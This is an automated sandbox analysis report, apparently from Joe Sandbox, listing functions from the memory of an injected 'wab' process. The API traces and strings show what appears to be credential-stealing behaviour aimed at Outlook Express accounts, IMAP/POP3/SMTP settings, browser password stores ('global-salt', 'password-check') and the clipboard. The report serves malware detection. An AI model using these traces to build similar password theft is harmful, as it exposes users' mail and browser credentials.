                                                                                                                                                                                                                        • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,.8D,00443752,?,?,*.oeaccount,.8D,?,00000104), ref: 0044369D
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 004436AF
                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004436BE
                                                                                                                                                                                                                        • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                                                                                                                                                                                                        • Part of subcall function 00443546: wcslen.MSVCRT ref: 00443559
                                                                                                                                                                                                                        • Part of subcall function 00443546: ??2@YAPAXI@Z.MSVCRT ref: 00443562
                                                                                                                                                                                                                        • Part of subcall function 00443546: WideCharToMultiByte.KERNEL32(00000000,00000000,004436E8,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004436E8,?,00000000), ref: 0044357B
                                                                                                                                                                                                                        • Part of subcall function 00443546: strlen.MSVCRT ref: 004435BE
                                                                                                                                                                                                                        • Part of subcall function 00443546: memcpy.MSVCRT ref: 004435D8
                                                                                                                                                                                                                        • Part of subcall function 00443546: ??3@YAXPAX@Z.MSVCRT ref: 0044366B
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 004436E9
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004436F3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                                                                                      • String ID: .8D
                                                                                                                                                                                                                      • API String ID: 1886237854-2881260426
                                                                                                                                                                                                                      • Opcode ID: e9accfc59e3ea295214b65d31af1a641a7a6f9c6ce4573a7963a3bdc594cfe72
                                                                                                                                                                                                                      • Instruction ID: b4a99ca98ea4b9fd05b978b53b3f03ecc28babd8507da3569ede40c7aa85cfb3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e9accfc59e3ea295214b65d31af1a641a7a6f9c6ce4573a7963a3bdc594cfe72
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42012432804248BFEB206F75EC4ED9FBB6CEF46364B10812BF81487261DA358D14CA28
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00441E91 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 259COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00441F4B
                                                                                                                                                                                                                        • Part of subcall function 00441A6C: memcmp.MSVCRT ref: 00441AB5
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcmpmemcpy
                                                                                                                                                                                                                      • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                                                                                                                                                      • API String ID: 1784268899-4153596280
                                                                                                                                                                                                                      • Opcode ID: 6b6b8ae9c0e91365de8150e640e5bb5f4ec7e5282d2e56bc441d5ca3420a582e
                                                                                                                                                                                                                      • Instruction ID: db602eaa8e833254b0c0c9be43f42c24c685b457dfa8f14c56b0ec28138b2128
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b6b8ae9c0e91365de8150e640e5bb5f4ec7e5282d2e56bc441d5ca3420a582e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5091E2B1900700AFE730AF25C981A9EBBE5AB44304F14492FF14697392C7B9A985CB59
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040FB27 Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040F7DE,00000000,?), ref: 0040FB5E
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FBBB
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FBCD
                                                                                                                                                                                                                        • Part of subcall function 0040FA44: _mbscpy.MSVCRT ref: 0040FA6A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FCB4
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 0040FCD9
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,0040F7DE,?), ref: 0040FD23
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3974772901-0
                                                                                                                                                                                                                      • Opcode ID: 4ad987a4bc41c02407afd48bd51c39f8f43132cb09b5aa7545cf57ad8340978a
                                                                                                                                                                                                                      • Instruction ID: 4cd0dab2c11de29b1205cc267bdcfe4bbed2ca853fb67bca61950d18440e6937
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ad987a4bc41c02407afd48bd51c39f8f43132cb09b5aa7545cf57ad8340978a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 79511EB590021CABDB60DF95DD85ADEBBB8FF44305F1000BAE609A2281D7759E84CF69
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00443546 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 00443559
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00443562
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004436E8,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004436E8,?,00000000), ref: 0044357B
                                                                                                                                                                                                                        • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 0044288D
                                                                                                                                                                                                                        • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428AB
                                                                                                                                                                                                                        • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428C6
                                                                                                                                                                                                                        • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428EF
                                                                                                                                                                                                                        • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 00442913
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004435BE
                                                                                                                                                                                                                        • Part of subcall function 004429E9: ??3@YAXPAX@Z.MSVCRT ref: 004429F4
                                                                                                                                                                                                                        • Part of subcall function 004429E9: ??2@YAPAXI@Z.MSVCRT ref: 00442A03
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 004435D8
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0044366B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 577244452-0
                                                                                                                                                                                                                      • Opcode ID: 4370cab8d1ed043324ede4dc3b9a4d06d61cdd8212607e5f6e8765e25bb93f57
                                                                                                                                                                                                                      • Instruction ID: ed198900897cbedb477538fc3de06edee324e7a25cf08c3aedaf46951cf6a217
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4370cab8d1ed043324ede4dc3b9a4d06d61cdd8212607e5f6e8765e25bb93f57
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14318672804219AFEF21EF65C8819DEBBB5EF45314F5480AAF108A3200CB396F84DF49
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00404469 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
                                                                                                                                                                                                                        • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 004044FA
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 00404518
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _strcmpi$memcpystrlen
                                                                                                                                                                                                                      • String ID: imap$pop3$smtp
                                                                                                                                                                                                                      • API String ID: 2025310588-821077329
                                                                                                                                                                                                                      • Opcode ID: 4172489bfdd0b02c38134a290eb16c247b5a863f83d9230e12e3431aa9a1b902
                                                                                                                                                                                                                      • Instruction ID: ee17be80c36da3591ff53c386c7625c128025028662cc5e87d89578f4f8b6d75
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4172489bfdd0b02c38134a290eb16c247b5a863f83d9230e12e3431aa9a1b902
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C42196B25046189BEB51DB15CD417DAB3FCEF90304F10006BE79AB7181DB787B498B59
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040BD68 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040BD88
                                                                                                                                                                                                                        • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                                                                                        • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                                                                                        • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                                                                                        • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
                                                                                                                                                                                                                        • Part of subcall function 00407446: memset.MSVCRT ref: 00407466
                                                                                                                                                                                                                        • Part of subcall function 00407446: sprintf.MSVCRT ref: 00407493
                                                                                                                                                                                                                        • Part of subcall function 00407446: strlen.MSVCRT ref: 0040749F
                                                                                                                                                                                                                        • Part of subcall function 00407446: memcpy.MSVCRT ref: 004074B4
                                                                                                                                                                                                                        • Part of subcall function 00407446: strlen.MSVCRT ref: 004074C2
                                                                                                                                                                                                                        • Part of subcall function 00407446: memcpy.MSVCRT ref: 004074D2
                                                                                                                                                                                                                        • Part of subcall function 00407279: _mbscpy.MSVCRT ref: 004072DF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                                                                                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                                                      • API String ID: 2726666094-3614832568
                                                                                                                                                                                                                      • Opcode ID: dc175560a6198b9798b44ce5f971e01ac777fcc381b56c1877e1d198c2103063
                                                                                                                                                                                                                      • Instruction ID: 9cc38d581f61d2a6594629c27ef9ad5a8c62d4d42b688fbaa09f609bba3e4d8d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc175560a6198b9798b44ce5f971e01ac777fcc381b56c1877e1d198c2103063
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0121FBB1C002599ADB40EFA5D981BDDBBB4AB08308F10517EF548B6281DB382A45CB9E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00403A53 Relevance: 9.1, APIs: 6, Instructions: 56filestringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403A78
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403A91
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AA8
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AC7
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00403AD9
                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AEA
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1786725549-0
                                                                                                                                                                                                                      • Opcode ID: e58b70ba74cd0776df0cd714b6ebe3d4fb4c03e2cd7b5e97725e455eaa9c95ba
                                                                                                                                                                                                                      • Instruction ID: 3c11530c7ff43e2cab0ee1a3c4b7d34204fc8064c5823527b9b114d7af9e1f20
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e58b70ba74cd0776df0cd714b6ebe3d4fb4c03e2cd7b5e97725e455eaa9c95ba
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50112DBA80412CBFFB10AB94DC85EEBB3ADEF09355F0001A6B715D2092D6359F548B78
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040BE9E Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,?), ref: 0040BEB8
                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040BECA
                                                                                                                                                                                                                      • GetTempFileNameA.KERNEL32(?,00446634,00000000,?), ref: 0040BEEC
                                                                                                                                                                                                                      • OpenClipboard.USER32(?), ref: 0040BF0C
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040BF25
                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 0040BF42
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2014771361-0
                                                                                                                                                                                                                      • Opcode ID: f1e64fb6be10128bbee6f3e595a742589036f7cac5447e39c680a47d04657e65
                                                                                                                                                                                                                      • Instruction ID: 907fbb9bc954c15d9eb0ad6f98a85717611d4d669dd49ad048df0fde8b6b2f4b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1e64fb6be10128bbee6f3e595a742589036f7cac5447e39c680a47d04657e65
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B11A1B6900218ABDF20AB61DC49FDB77BCAB11701F0000B6B685E2092DBB499C48F68
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00406113 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00406129
                                                                                                                                                                                                                        • Part of subcall function 00406057: memcmp.MSVCRT ref: 00406075
                                                                                                                                                                                                                        • Part of subcall function 00406057: memcpy.MSVCRT ref: 004060A4
                                                                                                                                                                                                                        • Part of subcall function 00406057: memcpy.MSVCRT ref: 004060B9
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00406154
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 0040617C
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00406199
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcmp$memcpy
                                                                                                                                                                                                                      • String ID: global-salt$password-check
                                                                                                                                                                                                                      • API String ID: 231171946-3927197501
                                                                                                                                                                                                                      • Opcode ID: e64782263ff5605526e0fe757cea6ed3191f710ccf3b0afa5e67e353afe61262
                                                                                                                                                                                                                      • Instruction ID: 655c6eb068c7835b63414ef3c9938ae25085d91347c247b77763f6b5778615a8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e64782263ff5605526e0fe757cea6ed3191f710ccf3b0afa5e67e353afe61262
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E301D8B954070466FF202A628C42B8B37585F51758F024137FD067D2D3E37E87748A4E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00442960 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                      • Opcode ID: 61b661c510ad4b0743117b2440ebaa6c68aec67bf7d0c3759525eee1844cf9ab
                                                                                                                                                                                                                      • Instruction ID: 5b630ca211e00ee6ab232d4f5fe81ba50f7f923f282134244f429d4b925a3085
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 61b661c510ad4b0743117b2440ebaa6c68aec67bf7d0c3759525eee1844cf9ab
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7501A272E0AD31A7E1257A76554135BE3686F04B29F05024FB904772428B6C7C5445DE
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00401693 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004016A2
                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000015), ref: 004016B0
                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000014), ref: 004016BC
                                                                                                                                                                                                                      • BeginPaint.USER32(?,?), ref: 004016D6
                                                                                                                                                                                                                      • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E5
                                                                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 004016F2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 19018683-0
                                                                                                                                                                                                                      • Opcode ID: d93d450dc478f7866c229f4a037813e0caab4cabbf567c971482d52d831a5164
                                                                                                                                                                                                                      • Instruction ID: 724a62348f30ed3062fc78c586e299175c66965872e24402369681ac2eeab922
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d93d450dc478f7866c229f4a037813e0caab4cabbf567c971482d52d831a5164
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0701FB76900619AFDF04DFA8DC499FE7BBDFB45301F00046AEA11AB295DAB1A914CF90
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040C319 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 0040C352
                                                                                                                                                                                                                      • SetFocus.USER32(?,?,?), ref: 0040C3F8
                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000000), ref: 0040C4F5
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: DestroyFocusInvalidateRectWindow
                                                                                                                                                                                                                      • String ID: XgD$rY@
                                                                                                                                                                                                                      • API String ID: 3502187192-1347721759
                                                                                                                                                                                                                      • Opcode ID: 0547b1f3527a77a0dd6e05b9ba2639b12fbf26f65146718a21d2de361d27d990
                                                                                                                                                                                                                      • Instruction ID: f774ea8d8eb1800fd2ad86f321479c1d669f6cdc6fcff53b53818c93aeeaee42
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0547b1f3527a77a0dd6e05b9ba2639b12fbf26f65146718a21d2de361d27d990
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F518630A04701DBCB34BB658885D9AB3E0BF51724F44C63FF4656B2E2C779A9818B8D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004062D9 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00406376
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00406389
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040639C
                                                                                                                                                                                                                        • Part of subcall function 00404883: memset.MSVCRT ref: 004048BD
                                                                                                                                                                                                                        • Part of subcall function 00404883: memset.MSVCRT ref: 004048D1
                                                                                                                                                                                                                        • Part of subcall function 00404883: memset.MSVCRT ref: 004048E5
                                                                                                                                                                                                                        • Part of subcall function 00404883: memcpy.MSVCRT ref: 004048F7
                                                                                                                                                                                                                        • Part of subcall function 00404883: memcpy.MSVCRT ref: 00404909
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 004063E0
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 004063F3
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00406420
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00406435
                                                                                                                                                                                                                        • Part of subcall function 0040625B: memcpy.MSVCRT ref: 00406287
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 438689982-0
                                                                                                                                                                                                                      • Opcode ID: c11b14cc7bfefcbecd474d69538c451392e9e517f6ba4719ba6800d6460efb6e
                                                                                                                                                                                                                      • Instruction ID: a962c966a65fcbb98db0a5903e2df7d2d9caef1a51b72161af640e80cc8fe1a9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c11b14cc7bfefcbecd474d69538c451392e9e517f6ba4719ba6800d6460efb6e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 744140B290050DBEEB51DAE8CC41EEFBB7CAB4C704F004476F704F6051E635AA598BA6
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00443E22 Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00443E43
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00443E5C
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00443E70
                                                                                                                                                                                                                        • Part of subcall function 00443946: strlen.MSVCRT ref: 00443953
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00443E8C
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00443EB1
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00443EC7
                                                                                                                                                                                                                        • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CFB8
                                                                                                                                                                                                                        • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFE4
                                                                                                                                                                                                                        • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFFA
                                                                                                                                                                                                                        • Part of subcall function 0040CFC5: memcpy.MSVCRT ref: 0040D031
                                                                                                                                                                                                                        • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D03B
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00443F07
                                                                                                                                                                                                                        • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF6A
                                                                                                                                                                                                                        • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF94
                                                                                                                                                                                                                        • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D00C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset$strlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2142929671-0
                                                                                                                                                                                                                      • Opcode ID: 1fb1ec72e13faa5c4450662030dd608fc909945337c7cb58045cb7f4428127cf
                                                                                                                                                                                                                      • Instruction ID: 7aa756fa7cbdb75c5c05895f31091f080fe59031f56f6a961c38bdf577465876
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1fb1ec72e13faa5c4450662030dd608fc909945337c7cb58045cb7f4428127cf
